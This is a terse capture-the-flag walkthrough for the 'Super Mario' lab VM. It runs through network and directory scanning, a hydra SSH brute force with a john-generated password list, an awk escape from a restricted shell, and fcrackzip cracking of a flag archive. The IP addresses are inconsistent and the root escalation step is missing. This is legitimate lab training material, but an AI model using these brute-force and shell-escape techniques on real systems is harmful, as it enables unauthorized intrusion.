Level: Intermediate

WalkThrough:
https://github.com/Hamza-Megahed/CTFs/blob/master/super-mario/README
http://resources.infosecinstitute.com/super-mario-ctf-walkthrough/#gref




 arp-scan -l 

########################################
nmap -sV -p- 192.168.230.136

Nmap scan report for mario.supermariohost.local (192.168.230.136)
Host is up (0.00028s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
8180/tcp open  http    Apache httpd
MAC Address: 00:0C:29:A2:5D:C0 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
#########################################################################################

dirb http://192.168.230.136:8180 /usr/share/wordlists/dirb/big.txt
result:
---- Scanning URL: http://192.168.230.136:8180/ ----
+ http://192.168.230.136:8180/server-status (CODE:403|SIZE:215)                                                                                                                                             
+ http://192.168.230.136:8180/vhosts (CODE:200|SIZE:1364)
#######################################################################################

Browsing to http://192.168.230.136:8180/vhosts

<VirtualHost *:80>
	# The ServerName directive sets the request scheme, hostname and port that
	# the server uses to identify itself. This is used when creating
	# redirection URLs. In the context of virtual hosts, the ServerName
	# specifies what hostname must appear in the request's Host: header to
	# match this virtual host. For the default virtual host (this file) this
	# value is not decisive as it is used as a last resort host regardless.
	# However, you must set it for any further virtual host explicitly.
	
	ServerName mario.supermariohost.local  <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/supermariohost  
	DirectoryIndex mario.php               <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

	# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
	# error, crit, alert, emerg.
	# It is also possible to configure the loglevel for particular
	# modules, e.g.
	#LogLevel info ssl:warn

	ErrorLog ${APACHE_LOG_DIR}/supermariohost_error.log
	CustomLog ${APACHE_LOG_DIR}/supermariohost_access.log combined

	# For most configuration files from conf-available/, which are
	# enabled or disabled at a global level, it is possible to
	# include a line for only one particular virtual host. For example the
	# following line enables the CGI configuration for this host only
	# after it has been globally disabled with "a2disconf".
	#Include conf-available/serve-cgi-bin.conf
</VirtualHost>

##############################################################################

echo "192.168.163.133 mario.supermariohost.local" >> /etc/hosts
cat /etc/hosts <<< to check 

##################################################################

 browse to mario.supermariohost.local:8180
 
 ##############################################
 
 
 dirb http://mario.supermariohost.local:8180 /usr/share/wordlists/dirb/big.txt -X .php

---- Scanning URL: http://mario.supermariohost.local:8180/ ----
+ http://mario.supermariohost.local:8180/command.php (CODE:200|SIZE:231)       
+ http://mario.supermariohost.local:8180/mario.php (CODE:200|SIZE:7080)
#######################################################################################
user.txt:

mario 
luigi
peach
yoshi
toad
#################

$ to create a potentioal passwords list of the above five names
john --wordlist:user --rules --stdout > pass.txt     
#######################

Now we have two files: 1) user.txt. 2)pass.txt
we should run hydra with to brute force. 

hydra -L user.txt -P pass.txt -t 3 192.168.230.136 ssh            $it's gonna take a while, so you've to wait till it's done. 
  [ssh] host: 192.168.190.132   login: luigi   password: luigi1
######################################################
WOW: 

ssh luigi@192.168.230.136 
Password: luigi1 


luigi:~$ ?
awk  cat  cd  clear  echo  exit  help  history  ll  lpath  ls  lsudo  vim

$  awk 'BEGIN{system("/bin/bash")}'





############
fcrackzip flag.zip -D -p /usr/share/wordlists/rockyou.txt -u
PASSWORD FOUND!!!!: pw == ilovepeach
#############################################3

cat flag.txt 
Well done :D If you reached this it means you got root, congratulations.
Now, there are multiple ways to hack this machine. The goal is to get all the passwords of all the users in this machine. If you did it, then congratulations, I hope you had fun :D

Keep in touch on twitter through @mr_h4sh

Congratulations again!
								
mr_h4sh





